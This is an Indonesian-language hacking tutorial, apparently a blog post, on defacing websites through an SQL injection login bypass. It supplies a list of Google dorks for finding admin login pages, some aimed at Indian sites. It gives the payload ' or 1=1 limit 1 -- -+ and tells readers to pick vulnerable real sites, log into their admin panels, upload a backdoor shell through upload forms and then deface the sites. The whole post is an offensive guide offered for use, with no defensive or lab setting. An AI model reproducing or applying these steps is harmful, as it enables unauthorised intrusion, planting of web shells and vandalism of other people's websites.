kembali lagi bersama cilacapcyber, Kali ini
saya akan memberikan Cara Deface Metode Bypass SQL Login
metode ini lumayan sering digunakan ketika kita deface metode sql injection.
Note : Admin login sudah ketemu, tapi password tidak Bisa dihash.
Oke Langsung Eksekusi 😄..
Bahan" yang diperlukan :
- Dork
inurl:"login.php" site:in
inurl:"admin-login" site:in
inurl:"admin/login.php"
inurl:"admin_login.php"
inurl:"panel_login.php"
inurl:"administrator_login"
inurl:"user_login.php"
inurl:"administrator login" intext:"admin login"
inurl:"controller=adminlogin"
inurl:"admin" intext:"solution"
inurl:"admin-cp"
inurl:"admin-panel"
inurl:"/admin"
inurl:"Login admin"
inurl:"/admin/index.php"
inurl:"/admin/home.php"
inurl:"/admin/dashboard.php"
inurl:"/admin/ceklogin.php"
intext:"username" intitle:"Login"
intext:"admin"
inurl:"cp-login/index.php"
inurl:"cp-login/index.html"
inurl:"login/admin"
inurl:"/login/login.php"
inurl:"/home/admin/"
(kembangin lagi dengan imajinasimu yak)
- Shell Backdoor / shell biasa
- Sc deface
- use Default
Username/Password:
' or 1=1 limit 1 -- -+
disini saya hanya memberikan step by step Tidak ada gambar dikarenakan lebih simpel karna mungkin kalian sudah paham
Step by step:
1) Dorking dulu, lalu pilih site yang menurut kalian vuln
2) masukkan U/P Nya :
' or 1=1 limit 1 -- -+
3) Jika Kita diarahkan ke dashboard panel admin maka berarti Bisa/Vuln SQL
4) Jika Ke dashboard Kalian cari tempat upload shell, biasanya di gallery, news, dll jika tidak bisa upload shell bisa menggunakan atau memasukkan tempat edit edit atau makai jso
Mungkin itu Saja
Semoga Bermanfaat dan berguna bagi Pemula SQL😁 Matur Suwun🙏